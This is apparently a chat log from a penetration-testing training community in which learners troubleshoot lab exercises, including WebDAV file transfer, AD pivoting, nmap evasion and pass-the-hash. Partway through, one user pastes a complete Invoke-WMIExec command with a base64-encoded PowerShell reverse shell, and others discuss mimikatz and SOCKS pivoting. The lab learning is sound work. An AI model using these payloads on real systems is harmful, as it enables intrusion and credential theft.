$sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous 
Running without configuration file.
11:21:10.855 - WARNING : App wsgidav.mw.cors.Cors(None).is_disabled() returned True: skipping.
11:21:10.857 - INFO    : WsgiDAV/4.2.0 Python/3.11.2 Linux-6.5.0-13parrot1-amd64-x86_64-with-glibc2.36
11:21:10.857 - INFO    : Lock manager:      LockManager(LockStorageDict)
11:21:10.857 - INFO    : Property manager:  None
11:21:10.857 - INFO    : Domain controller: SimpleDomainController()
11:21:10.857 - INFO    : Registered DAV providers by route:
11:21:10.857 - INFO    :   - '/:dir_browser': FilesystemProvider for path '/usr/lib/python3/dist-packages/wsgidav/dir_browser/htdocs' (Read-Only) (anonymous)
11:21:10.857 - INFO    :   - '/': FilesystemProvider for path '/tmp' (Read-Write) (anonymous)
11:21:10.857 - WARNING : Basic authentication is enabled: It is highly recommended to enable SSL.
11:21:10.857 - WARNING : Share '/' will allow anonymous write access.
11:21:10.857 - WARNING : Share '/:dir_browser' will allow anonymous read access.
11:21:10.892 - INFO    : Running WsgiDAV/4.2.0 Cheroot/9.0.0 Python 3.11.2
11:21:10.892 - INFO    : Serving on http://0.0.0.0:80 ...

On Windows:

PS C:\Users\htb-student> dir \\10.10.15.145\tutu
dir : Cannot find path '\\10.10.15.145\tutu' because it does not exist.
[...]

PS C:\Users\htb-student> dir \\10.10.15.145\DavWWWRoot
dir : Cannot find path '\\10.10.15.145\DavWWWRoot' because it does not exist.
[...]

PS C:\Users\htb-student> wget http://10.10.15.145/tutu/file.txt -OutFile tutu.txt
PS C:\Users\htb-student> type tutu.txt
tutu

And here are the logs on Linux server:

11:23:39.454 - INFO    : 10.129.249.156 - (anonymous) - [2024-05-08 09:23:39] "GET /tutu/file.txt" depth=0, elap=0.002sec -> 200 OK

Is it possible that there are a firewall on the Windows machine? I would be surprised because I suppose the traffic goes through port 80 in both cases.

Don't think so

Can you do smbclient -U "" -N -L //127.0.0.1/?

From your attack machine

Creating a folder DavWWWRoot does not change anything:

PS C:\Users\htb-student> dir \\10.10.15.145\DavWWWRoot
dir : Cannot find path '\\10.10.15.145\DavWWWRoot' because it does not exist.
At line:1 char:1
+ dir \\10.10.15.145\DavWWWRoot
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (\\10.10.15.145\DavWWWRoot:String) [Get-ChildItem], ItemNotFoundExceptio
   n
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand

PS C:\Users\htb-student> wget http://10.10.15.145/DavWWWRoot/file.txt -OutFile dav.txt
PS C:\Users\htb-student> type dav.txt
something

Just do dir \\ip\

See if that lists something

MarcieLee is helping you, otherwise if I have time I'll spawn the machine and recreate everything since I did it quite a while ago

This does not work either:

$smbclient -U "" -N -L //127.0.0.1/
do_connect: Connection to 127.0.0.1 failed (Error NT_STATUS_CONNECTION_REFUSED)
$smbclient -U "" -N -p80 -L //127.0.0.1/
Protocol negotiation to server 127.0.0.1 (for a protocol between SMB2_02 and SMB3) failed: NT_STATUS_CONNECTION_DISCONNECTED

I get the same error:

PS C:\Users\htb-student> dir \\10.10.15.145\
dir : Cannot find path '\\10.10.15.145\' because it does not exist.
At line:1 char:1
+ dir \\10.10.15.145\
+ ~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (\\10.10.15.145\:String) [Get-ChildItem], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand

i just solved this unintendedly via hybrid analysis, anyone mind telling me how im supposed to actually find the function via x64dbg/IDA?

I also tried to accept more version of the protocol by modifing my /etc/samba/smb.conf file, but I still have the same error:

$smbclient -U "" -N -p80 -L //127.0.0.1/
Protocol negotiation to server 127.0.0.1 (for a protocol between LANMAN1 and SMB3) failed: NT_STATUS_CONNECTION_DISCONNECTED

I generally don't bother with wsgidav ¯_(ツ)_/¯

Other methods are more reliable

Also DavWWWRoot is special as windows should recognize it, but linux doesn't

https://csbygb.gitbook.io/pentips/post-exploitation/file-transfers

can someone help me how to modify the script in the Broken Authentication - Predictable Reset Token - Question 1 module

UTC, +/- 1 second (1000ms on each end

In total it's 2001 requests, -1 second, current, +1 second

can i dm u for a second

No

Haven't done this modul

Just echoing the common thing

Range needs to start before and after "now"

Also time needs to be in ms

You're checking epoch time

120 sounds like you're doing 120 seconds or so

I forget how it works

Also wrap your codeblock in backticks

Hello everyone, stuck on PASSWORD ATTACKS, Pass the Hash (PtH) question : Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

After I connect to a powershell console using Julio's credentials, I run the commands suggested in the lesson and apparently Import-Module is not recognized as a cmdlet and when I run the Invoke-WMIExec command, I get nothing.

Put ```\php before and ``` after your code

ok

But 120 is a wide fucking range

Your start_time is only doing (current time - 120 seconds) and the range is only 1+ that

So you're literally not even checking the right parameters

Is that the code given?

Or did you generate that code yourself

given

Ah

Please feel free to DM 🙂

this is the hint Convert the displayed date to epoch time in milliseconds and use it in the script you will create.

Again, haven't touched the module, so there's likely something simple you're overlooking

Yes

Which is where +/- 1s comes from

Or +/- 1000 ms

In WEB SERVICE & API ATTACKS
SOAPAction Spoofing

upper payload gives 'This function is only allowed in internal networks' but lower payload works why?

ExecuteCommandRequest vs LoginRequest

A command request should be executed by internal networks

Wheras you can login from "outside" to the forward facing service

You invoke the module on the machine you are rdped into.

Its same as rhe screenshot

cannt do it i hate python

not my problem lol. ¯_(ツ)_/¯

i know bro i am not forcing you into helping xdd i am just saying

If the expected solver is in py then not much you can do about that

You can basically use any programming language to create the token and send it to the website

Hi, thanks for the answer! So I'm connected via rdp to julio on MS01. I have opened a port using nc.exe on one terminal, and i am launching the command : '.\Invoke-WMIExec -Target DC01 -Username julio -Domain inlanefreight.local -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e ..."' and yet I don't get anything on the nc.exe listener...

Is your b64 revshell correct?

Hello, need little help please, I think I deleted hashcat by mistake, how could I reinstall it ?

Generally sudo apt install hashcat should work

Second: how did you accidentally delete it? Running around as root?

If it gives error, try adding --fix-broken or --fix-missing

Well it long story hahahah

sudo apt install hashcat
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
hashcat : Depends: hashcat-data (>= 6.2.6+ds2-1) but 6.2.6+ds1-1 is to be installed
Depends: libminizip1t64 but it is not installable
E: Unable to correct problems, you have held broken packages.

I'd send you a screenshot if I could but it seems discord won't let me. On the website I chose 172.16.1.5, port 9001 and PowerShell #3 (Base64). I don't think there is anything else to select... And I ran nc.exe -lnvp 9001.

hey, got stuck on that one for hours. Try event.created and mess with the customize time interval 😉

Is 172.16.1.5 your ip?

Check with ipconfig /all

And look for the 172.16 interface

Again your reverse needs to be correct alongside the target

I think it is, when I am connected as julio via rdp to MS01 and I run ipconfig /all, I get the ethernet1 2 interface which says that my ipv4 is 172.16.1.5

And your listener is running in another window to be extra sure

Also generally when listening for shells you do lvnp

Not lvp

parallel_read returned NT_STATUS_IO_TIMEOUT how do i solve this ?

Pray for a better connection

oh no

that's sad

But on a serious note: if not already, use tcp vpn. If that doesn't resolve, change vpn region

ok i'try ycp

tcp

Hello

I want to install lixus

SO yes I just re-did it, I have a powershell window running the nc.exe and a powershell window running the invoke and it still doesn't work

But I am phone

Have!

Running linux distros on a phone sucks

you know sometimes powershell just doesn't work

that's when you rely on the good ol classic nc for windows

What I install

Don't

Just wait until you have a laptop

I don't have money

did it and still nothing

I have 16 old

Even a half-decent $100 laptop is better than a phone

Ok

do you know if the windows host even has nc?

Most things are designed for laptop/Desktop distros

Yes

There is a folder called C:\tools in which there is a nc.exe executable

can anyone download the file for me please ?

It's in c:/tools

No

and when I run it does what it generally does with nc so I don't think the problem comes from here

I have destroy laptop

i already cracked the password on pwnbox but i can't get the file

i am not cheating

damn dude.. if you got your ports forwarded correctly then it should work

what shell are you running nc in

I tried powershell and cmd.exe

Broken Authentication Predictable Reset Token
if anyone did this module and i can DM to help with modifing the script i will apprentice it so much ❤️

anyone already passed Password Attacks Lab - Hard ?

Yes

yea i did

i just need the backup.vhd

The smb file download is one of the semi-final steps

Did you try changing vpn regions?

Here's the full command just to be sure:
PS C:\tools\Invoke-TheHash> .\Invoke-WMIExec -Target DC01 -Username julio -Domain inlanefreight.htb -Hash --hash-- -Command "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA3ADIALgAxADYALgAxAC4ANQAiACwAOQAwADAAMQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=

Resetting target

This command contains a spoiler for the hash of the user

I suggest redacting the hash

At least if you're sharing it

but it's given in the lesson

no: the admin hash is, one of the questions is to obtain Julio's hash

i have tried changing region, reset target, reboot my vm,and change my vpn from udp to tcp like you just said

none of them worked

terminate box -> restart it -> wait like 5 minutes

the issue is that your connection for w/e reason isn't stable

so if you tried multiple vpn regions then it's not HTB

Julio's hash is used in all the examples of the lesson

oh this isn't even a pivoting thing.

nope

Password Attacks - PtH section

if it's an imported module, why are you using .\Invoke-WMIExec

to run a remote command

does that work? the .\

oh

didn't realize that part, just waking up myself

it's even worse when i don't have access to a pc. can't check anything, tired af

yea Powershell Commandlets aren't run with ./

Ok I'll try without then

you import things with import-module C:/path/to/file or ./file.psd1 if in the local directory

WORKED!!! Finally
So the error was using .\ after having imported

very good. .\ is just gonna try to run whatever is in your current dir

For the Server-Side Attacks Module in the SSTI section I could not get the tplmap tool mentioned in the module. I ended up using SSTIMap from github and it worked with the same command line arguments in the example on that module

👍

anyone solved this before
Broken Authentication - Predictable Reset Token - module

Hi guys im on AD skills assesment 1 im stuck on the question "Find cleartext credentials for another domain user. Submit the username as your answer. " I just cant get a stable shell on MS01 to run mimikatz.exe on it, Ive tried enter-pssession but its veryy unstable and im trying to transfer nc64.exe to it with Invoke-Command but i cant can someone help?

Can’t move files from Bob

C:>move sam.save \10.10.15.75\CompData
Access is denied.
0 file(s) moved.

man... sql statements really like their spaces for the comment huh

do you have write access to the fileshare you're hosting?

if you're sharing from a root-protected directory, that can cause problems

i suggest launching the smb share from /tmp/

Hi guys im on AD skills assesment 1 im stuck on the question "Find cleartext credentials for another domain user. Submit the username as your answer. " I just cant get a stable shell on MS01 to run mimikatz.exe on it, Ive tried enter-pssession but its veryy unstable and im trying to transfer nc64.exe to it with Invoke-Command but i cant can someone help?

try running mimikatz and passing commands to it as `./mimikatz.exe "<command>" "exit"

the issue is i cant transfer mimikatz to it

Hi guys, i just finished "Firewall and IDS/IPS Evasion - Hard Lab"
i was really close to give up and quit the whole job path until i found the solution. BUT i have no idea how should i get the solution with enumeration.. also, did not understand the question correctly.. i thought, "the service" is still referencing to the dns.. am i stupid? and can somebody maybe explain to me in pm how i should enumerate this port correctly?

ah; i believe you get a user/pass from the first questions yeah?

yeah

well use a pivot to gain access to the network

and work from there

ive enter-pssession to it

dns is a part of it

but it just doesnt want to download anything

see where you have to use the --source-port

are you using the provided upload functionality of the webshell?

ive trasnferred everything through the webshell all the tools but im trying to download the files on the webshell to ms01

i know whats DNS' part of it, but i didn't get the port i have to target in my first enumeration.. i found it by accident.. so i have to work on my port scanning skills, so i would like to know where i failes 🙂 i used nmap with -F

port 53 is the DNS port

if you read the IDS/IPS evasion section again, specifucally where it talks about using a source port it will illuminate more

ohhh so i can use -F with --source-port?

without setting source port (so allowing your system to designate port > 1023) the server treats the request as a random scrape and denies access

i don't recommend -F if you're trying to be evasive

also -F could miss ports that take a minute to respond

-T4 is the safest most aggressive timing option

but i had no hint for the port i was looking for... should i make port lists on my own?

-F only scans the top 100 COMMON ports

-p- scans all ports

you're gonna miss the right port if you don't properly enumerate

ohh i get, so i use -p- with T4 is saver with more ports detected

yes

-T4 sets a bunch of timing options

while -F says it's the "Fast option" it's Fast because it's ONLY scanning 100 ports

Hi guys

whereas the port required for the answer is outside the top 100 port range

(and requires some other techniques to find)

yea i understood that, but i tested with t1 (i think) and it lasted hours.. so i was thinking, that this couldn't be correct

t1 is the slowest timing

t0 would be actually

literally slower than just running nmap without any timing options

well yes but you get the point

https://nmap.org/book/port-scanning-options.html

yea, thank you so much for the clarification.. i am sometimes a bit lost doing cpts without a pentesting background

i don't have a pentesting background either

i just RTFM and go

like i'm breezing through some modules where a handful of people got "stuck" and literally, my only slight problem was a missed syntax or character in payload

¯_(ツ)_/¯

Yo marcie lee can you just help me out on how to transfer a file from the webshell to ms01 with powershell would be much appreciated.

i.e. many people get stuck on the "bruteforcing" module... i found it mostly trivial... at least from the perspective of just doing what it says

many ways to transfer files ¯_(ツ)_/¯

yea but if you say t4 is correct and the lesson says t3 is default, then i don't get the evasion part if i scan even faster ^^

can you give me an example

you can host a python http server and from the webshell iwr http://your_ip:port/file -Output <filename>

you can read up on the file transfers module that was way early in the pentester path if you're following that

Yeah but thats a different case its the webshell to the MS01 a seperate windows machine on the 172 subnet

I need to re-set up my nginx hack filehosting server for it

not from linux to webshell ive done that

oh

depending on how you have access to MS01; you can mount a drive with xfreerdp

/drive:

ssh uses scp

scp source destination

i finished all the Broken Authentication molue except this part Predictable Reset Token

i only have a set of credentials to access ms01 but only through enter-pssession and its very non fucntional so im trying to somehow get nc64.exe on ms01 and then connect to it from the webshell

You will get through it friend. Don't give up. We all get stuck

you did it ?

why not upload and use a pivot on the webshell? so you can access the full network without being limited to the back-asswards webshell

not yet doing the web attacks module atm

yup me too i will start it now W teemo player BTW

there's some like ligolo that's just set up and go

i dont get when u mean pivot on the webshell like ive already downlaoded a revshell on the webshell so i can get a shell on my linux machine but i dont get what u mean by pivot

i mean a tool that acts as a bridge between the internal network and your system; see the Pivoting module for more info

though the most popular tool currently, isn't discussed in it

ah ok

so instead of having some revshell you can just either ping the internal network directly or via proxychains socks 4/5

are you doing the pentester path?

or just decided to pick up AD Enum

ur right but how am i gonna be able to download a file from my linux machine from ms01 since i cant download any tool onto ms01 to create a tunnel between the ms01 and webshell

AD Enum & attacks assumes some level of understanding of pivoting

yeah no ive done it

🤦

ok

let me be more clear

you don't need to bridge between ms01 and webshell

as they're connected

once you are running a pivot on the web01 host; you can connect directly to ms01

so any direct tool like xfreerdp or ssh will be viable

evil-winrm would likely be the viable option to connect to a ps session on MS01; and it has an upload/download functionality

MarcieLee why you not doing any of the exams. You seem pretty knowledgable?

bypassing the need to double hop your tools

i've not passed the path

alr thanks lemme try something

Ah ok you just cba or?

took like a few weeks off for mental health and catching up on uni work

ah ok makes sense

health comes first

spent 4 hours yesterday doing the web ones between AD enum and SQLi intro module

some of that time was literally I FORGOT TO SELECT Y ON AN OPTION IN CUPP

intro to whitebox pentesting / help :

i did this command : "curl -s -X POST -H "Content-Type: application/json" -d '{"email": "test@test.com"}' http://localhost:5000/api/auth/authenticate"
it generate me a token but the token doesnt work
i tried with this command : curl -s -X POST -H "Content-Type: application/json" -H "Authorization: Bearer <token>" -d '{"text": "this is a test"}' http://localhost:5000/api/service/generate

oh as a heads up you don't need to copy over all the mimikatz files for mimikatz to run, the binary works fine by itself

the other stuff is just additional helpers

bro im trying to create the webshell as a pivot but it just doesnt work C:\windows\system32\inetsrv>.\plink.exe -ssh -D 9050 kali@10.10.14.55
.\plink.exe -ssh -D 9050 kali@10.10.14.55
FATAL ERROR: Network error: Connection timed out

C:\windows\system32\inetsrv>

brother

use the existing webshell to drop the pivot on

also is ssh running on your kali

yes

really dont get what u mean

but there's a bunch of other tools to use